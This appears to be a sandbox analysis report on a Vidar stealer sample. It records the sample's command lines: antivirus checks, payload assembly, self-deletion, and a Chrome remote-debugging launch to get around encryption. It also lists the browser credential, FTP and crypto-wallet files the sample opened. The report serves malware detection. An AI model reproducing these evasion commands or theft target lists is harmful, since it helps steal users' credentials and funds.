Code function: 10_2_00925FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

10_2_00925FC8

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\628056\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\628056	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVM
Source: Corrections.com, 0000000A.00000002.2819153926.0000000001B8A000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2819153926.0000000001B09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004D99000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 12.1960009dd8757fc4c7a65dceef295f6e0INSERT_KEY_HEREGetProcALoadLibrlstrcatAOpenEvenCreateEvCloseHanVirtualAllocExNuVirtualFGetSysteVirtualAHeapAlloGetComputerNameAlstrcpyAGetProceGetCurrentProceslstrlenAExitProcSystemTimeToFileadvapi32gdi32.dluser32.dcrypt32.ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerStGetWindowsDirectGetModuleFileNamDeleteFiFindNextLocalFreFindClosSetEnvironmentVaLocalAllReadFileSetFilePWriteFilCreateFiFindFirsCopyFileVirtualPGetLastElstrcpynMultiByteToWideCGlobalFrWideCharToMultiBGlobalAlOpenProcTerminateProcessgdiplus.ole32.dlbcrypt.dwininet.shlwapi.shell32.psapi.dlrstrtmgrCreateCompatibleSelectObDeleteObGdiplusSGdiplusShutdownGdipSaveImageToSGdipDisposeImageGdipFreeGetHGlobalFromStCreateStreamOnHGCoUninitCoInitiaCoCreateInstanceBCryptDeBCryptSetPropertBCryptDestroyKeyGetWindoGetDesktopWindowCloseWinwsprintfEnumDisplayDevicGetKeyboardLayouCharToOeRegQueryValueExARegEnumKRegOpenKRegCloseRegEnumVCryptBinaryToStrSHGetFolderPathAShellExecuteExAInternetOpenUrlAInternetConnectAInternetCloseHanInternetHttpSendRequestAHttpOpenRequestAInternetReadFileInternetCrackUrlStrCmpCAStrStrAStrCmpCWPathMatcRmStartSRmRegisterResourRmGetLisRmEndSessqlite3_sqlite3_prepare_sqlite3_column_tsqlite3_finalizesqlite3_column_bencrypteNSS_InitNSS_ShutPK11_GetInternalKeySlotPK11_FrePK11_AuthenticatPK11SDR_DecryptC:\ProgramData\profile:Login: PasswordOperaGXNetworkCookiesAutofillHistoryMonth: Login DaWeb Datalogins.jformSubmusernameencryptedUsernamencryptedPassworcookies.places.sPluginsSync Extension SettingsIndexedDOpera StOpera GX StableCURRENTchrome-extension_0.indexeddb.levLocal StprofilesfirefoxWallets%08lX%04ProductN%d/%d/%d %d:%d:%DisplayNDisplayVfreebl3.mozglue.msvcp140nss3.dllsoftokn3vcruntime140.dll/c start%DESKTOP%APPDATA%LOCALAP%USERPRO%DOCUMEN%PROGRAM%PROGRAMFILES_86%RECENT%\discord\Local Storage\l\Telegram Desktokey_dataD877F783D5D3EF8CA7FDF864FBC10B77A92DAA6EA6F891F2F8806DD0C461824FTelegram\.purpleaccountsdQw4w9Wgtoken: Software\Valve\SSteamPat\config\config.vDialogConfig.vdflibraryfolders.vloginuse\Steam\sqlite3.browsers\Discord\tokens.HTTP/1.1file_nammessagescreensh

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_0099F4FF BlockInput,

10_2_0099F4FF

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_0092338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_0092338B

Source: C:\Users\user\Desktop\lem.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_00945058 mov eax, dword ptr fs:[00000030h]

10_2_00945058

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_009820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

10_2_009820AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00952992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00952992
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00940BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00940BAF
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00940D45 SetUnhandledExceptionFilter,	10_2_00940D45
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00940F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00940F91

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

10_2_00981B4D

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_0092338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_0092338B

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_0098BBED SendInput,keybd_event,

10_2_0098BBED

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_0098EC9E mouse_event,

10_2_0098EC9E

Source: C:\Users\user\Desktop\lem.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 628056	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Cleared" Penalties	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Corrections.com u	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\628056\Corrections.com" & rd /s /q "C:\ProgramData\2N7Y58YCJW47" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_009814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

10_2_009814AE

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_00981FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

10_2_00981FB0

Source: Corrections.com, 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmp, Corrections.com.1.dr, Appeals.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Corrections.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_00940A08 cpuid

10_2_00940A08

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_0097E5F4 GetLocalTime,

10_2_0097E5F4

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_0097E652 GetUserNameW,

10_2_0097E652

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_0095BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

10_2_0095BCD2

Source: C:\Users\user\Desktop\lem.exe

Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406831

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Corrections.com PID: 5496, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Corrections.com	Binary or memory string: WIN_81
Source: Corrections.com	Binary or memory string: WIN_XP
Source: Appeals.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Corrections.com	Binary or memory string: WIN_XPe
Source: Corrections.com	Binary or memory string: WIN_VISTA
Source: Corrections.com	Binary or memory string: WIN_7
Source: Corrections.com	Binary or memory string: WIN_8

Source: Yara match	File source: 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2823074845.0000000004D99000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Corrections.com PID: 5496, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Corrections.com PID: 5496, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_009A2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		10_2_009A2263
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_009A1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		10_2_009A1C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
